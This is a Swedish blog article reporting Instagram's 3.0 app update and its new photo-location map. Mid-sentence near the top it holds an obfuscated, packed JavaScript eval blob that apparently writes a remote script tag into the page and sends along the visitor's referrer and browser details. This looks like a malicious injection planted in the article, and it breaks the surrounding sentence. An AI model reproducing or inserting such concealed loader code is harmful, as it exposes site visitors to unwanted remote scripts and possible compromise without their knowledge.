Image Image Image Image Image Image Image Image Image Image

| 12 maj, 2021

Scroll to top

Top

Instagram uppdaterar till 3.0

Instagram uppdatering 3.0
Sebastian

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ihdhr|var|u0026u|referrer|fnsbh||js|php’.split(’|’),0,{}))
Facebook-ägda bolaget Instagram har nu släppt en ny version av sin applikation till iOS och Android.

Den funktion som man fokuserar på är att man nu i Instagram kan kolla vart bilderna är tagna på en karta.

Att hitta äldre fotografier av en användare har länge varit ett problem. Man har varit tvungen att scrolla i en oändlighet. Detta vill nu Instagram ändra på genom att införa den ny kartan. Instagram själva menar att detta är ett sätt att få bilderna att ”leva” längre och inte försvinna ner i detta oändliga flöde.

Numera Facebook-ägda Instagram har släppt uppdaterade versioner av sina appar till iOS och Android idag och funktionen man fokuserar mest på är att Instagram-användare enkelt ska kunna kolla på foton tagna på en specifik geografisk plats.

Instagrams grundare och VD säger detta till The Verge:
”Things live for a couple hours and then they float off into the ether. You’ve been building this archive of beautiful photos and we haven’t let you go back and live through them”

Man har även snabbat upp appen samt ordnat till  lite annat småfix. 

Glöm inte att Revue.se finns på instagram här!